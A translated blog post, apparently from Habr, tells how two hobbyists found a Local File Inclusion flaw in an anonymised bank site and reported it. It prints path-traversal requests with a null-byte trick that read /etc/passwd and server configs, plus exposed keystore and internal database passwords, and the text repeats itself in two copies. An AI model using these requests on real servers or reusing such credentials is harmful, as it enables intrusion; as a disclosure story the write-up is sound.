Story of single penetration
Topics about hacker fishing made me write this post.
I want to share with you a story that happened to me several years ago.
I must say, my hobby is web application security.
')
By chance walking on the internet, my friend found a website for sending free sms to numbers of Ukrainian operators. There we found a small vulnerability associated with the circumvention of the Turing test (captcha).
Since my friend and I love to look for vulnerabilities, we played a game, the meaning of which, which of us will quickly pass the captcha.
But today the story is not about that, but about what was further discovered by us.
Once, my friend, looking through the source code of the page of the site for sending free sms, found an interesting HTML code:
The link that logically should download the file to the computer was very interesting for us.
In less than 5 minutes, we discovered the Local File Inclusion vulnerability.
The vulnerability was in the following link:
With this vulnerability, you can read local files directly in the browser.
We made a request to the server for a non-existent file, and this is what we received:
Request for url:
The server response was something like this:
Honestly, the first time I heard about Resin
And Resin is a high-performance application server that includes features such as scalability and load distribution.
Product information that we were able to find out on Wikipedia at the time:
After downloading this software, we started to study it.
And so, the Resin software folder structure:
Now let's go back to the vulnerability.
Let's start with the classics:
Under the link hackbank.ua/test?xslt_url=../../../../../../etc/passwd
we get this conclusion:
Then we started looking for where the Resin server's / conf folder is locally stored.
And found quite quickly.
The config is an XML file. Which was available on the link hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00
Next, we look at the source code of the resulting file.
Here are all the web server logs:
There we found nothing interesting. But we went further :)
File ../../../../../../conf/c2b-db-pool.xml%00 :
File ../../../../../../conf/db-pool.xml%00 :
Guess what is it? That's right, this is access to other servers on the internal network of the bank :)
The next day, we wrote a letter, described all the vulnerabilities that we managed to find. And they sent a letter to the bank post. After 3 weeks, vulnerabilities were present. We sent another letter, and after a week, we were fixed for the joy.
We did not want to offend anyone with this article, we just want to convey to the world that there are no secure systems. Hire professionals who will audit you information systems.
For any questions, please contact vadim@g-sg.net
Thanks for attention!
UPD. All errors in the text, write to private messages. Thank!
I want to share with you a story that happened to me several years ago.
I must say, my hobby is web application security.
')
By chance walking on the internet, my friend found a website for sending free sms to numbers of Ukrainian operators. There we found a small vulnerability associated with the circumvention of the Turing test (captcha).
Since my friend and I love to look for vulnerabilities, we played a game, the meaning of which, which of us will quickly pass the captcha.
But today the story is not about that, but about what was further discovered by us.
Once, my friend, looking through the source code of the page of the site for sending free sms, found an interesting HTML code:
<A HREF= "#" onClick= "javascript:window.open('https://hackbank.ua/test.php?code=MOBILE&state=2&xslt_url=service_host.xsl', ' 'quickpay','toolbar=0,status=0,menubar=0,scrollbars=0,width=650,height=400',false);" CLASS= "header" ><IMG SRC= "www.sms1.ua/img/topupeasy.jpg" WIDTH= "82"
HEIGHT= "34" ALT= " !" BORDER= "0" VSPACE= "0" ></A>
The link that logically should download the file to the computer was very interesting for us.
In less than 5 minutes, we discovered the Local File Inclusion vulnerability.
The vulnerability was in the following link:
hackbank.ua/test.php?code=MOBILE&state=2&xslt_url= <local _file >
With this vulnerability, you can read local files directly in the browser.
We made a request to the server for a non-existent file, and this is what we received:
Request for url:
hackbank.ua/test?&xslt_url=0
The server response was something like this:
500 Servlet Exception
...........................
Resin-3.0.s060216 (built Thu, 16 Feb 2006 09:17:50 PST)
Honestly, the first time I heard about Resin
And Resin is a high-performance application server that includes features such as scalability and load distribution.
Product information that we were able to find out on Wikipedia at the time:
Caucho Technology, Inc.
Caucho Technology, Inc.
3.1.1 — 2007
GPL
www.caucho.com (.)
After downloading this software, we started to study it.
And so, the Resin software folder structure:
¦ configure
¦ httpd.exe
¦ LICENSE
¦ Makefile.in
¦ README
¦ setup.exe
¦
+---automake
¦ config.guess
¦ config.sub
¦ install-sh
¦ ltmain.sh
¦ missing
¦
+---bin
¦ httpd.sh
¦
+---conf
¦ app-default.xml
¦ development.conf
¦ fine.conf
¦ minimal.conf
¦ password.xml
¦ resin-3_1.conf
¦ resin-admin.xml
¦ resin.conf
¦
+---contrib
¦ init.resin-iptables
¦ init.resin.in
¦
+---lib
¦ activation.jar
¦ eclipse-compil
Now let's go back to the vulnerability.
Let's start with the classics:
Under the link hackbank.ua/test?xslt_url=../../../../../../etc/passwd
we get this conclusion:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Servic
Then we started looking for where the Resin server's / conf folder is locally stored.
And found quite quickly.
The config is an XML file. Which was available on the link hackbank.ua/test?xslt_url=../../../../../../conf/resin.conf%00
% 00 is null-byte , telling the web server that this is the end of the line.
Next, we look at the source code of the resulting file.
<?xml version="1.0" encoding="utf-8"?>
<resin xmlns:resin= "caucho.com/ns/resin/core" xmlns= "caucho.com/ns/resin" >
<server>
<http port= "1080" />
<http port= "10443" >
<jsse-ssl>
<key-store-type> JKS </key-store-type>
<key-store-file> keys/hackbank.jks </key-store-file>
<password> fynbxfn </password>
<key-manager-factory> 6645b </key-manager-factory>
<ssl-context> SSL </ssl-context>
</jsse-ssl>
</http>
<host id= "" root-directory= "." >
<access-log path= "log/access.log" format= "%h %l %u %t "%r" %s %b "%i" "%i"" rollover-period= "1W" />
<stderr-log path= "log/stderr.log" timestamp= "[%Y.%m.%d %H:%M:%S.%s] " rollover-period= "1W" />
<stdout-log path= "log/stdout.log" rollover-period= "1W" />
<log path= "log/server.log" timestamp= "[%Y.%m.%d %H:%M:%S.%s] " rollover-period= "1W" />
<web-app id= "/" document-directory= "webapps/ROOT" />
<ear-deploy path= "deploy" >
<ear-default ejb-server-jndi-name= "java:comp/env/ejb" >
<ejb-server jndi-name= "java:comp/env/ejb" />
</ear-default>
</ear-deploy>
<web-app-deploy path= "webapps" />
<resource-deploy path= "deploy" />
<web-app-deploy path= "deploy" />
</host>
<resin:import path= "$/conf/db-pool.xml" />
<resin:import path= "$/conf/c2b-db-pool.xml" />
<resin:import path= "$/conf/db-pool-qp.xml" />
<resin:import path= "$/conf/hb-default.xml" />
<resin:import path= "$/conf/resin-status.xml" />
</server>
<resin:import path= "$/conf/resin-common.xml" />
</resin>
Here are all the web server logs:
hackbank.ua/test?xslt_url=../../../../../../log/access.log
hackbank.ua/test?xslt_url=../../../../../../log/stderr.log
hackbank.ua/test?xslt_url=../../../../../../log/server.log
There we found nothing interesting. But we went further :)
File ../../../../../../conf/c2b-db-pool.xml%00 :
10.1.101.195:5000
-----------------
user : C2BServer
password : vsirfysy
10.1.100.105:5000
-----------------
user : C2BServer
password : lfktrbq,thtu
10.1.100.115:5000
----------------
user : jbkl
password :123456
File ../../../../../../conf/db-pool.xml%00 :
10.1.101.51:5000
-------------------
user : 16_jag
password : u4BKoc7U5Edo
10.1.100.77:5000
-------------------
user : hskl
password : hsklhskl
10.1.99.49:4100
------------------
user : wbpfo_p424
password : aUKlOfcvT4YmAnk
10.1.99.82:5000
------------------
user : P24CVC
password : Login_4_P424CVC
Guess what is it? That's right, this is access to other servers on the internal network of the bank :)
The next day, we wrote a letter, described all the vulnerabilities that we managed to find. And they sent a letter to the bank post. After 3 weeks, vulnerabilities were present. We sent another letter, and after a week, we were fixed for the joy.
We did not want to offend anyone with this article, we just want to convey to the world that there are no secure systems. Hire professionals who will audit you information systems.
For any questions, please contact vadim@g-sg.net
* Attention! All links, as well as the name of the bank are changed for reasons of anonymity *
Thanks for attention!
UPD. All errors in the text, write to private messages. Thank!
Source: https://habr.com/ru/post/86368/
All Articles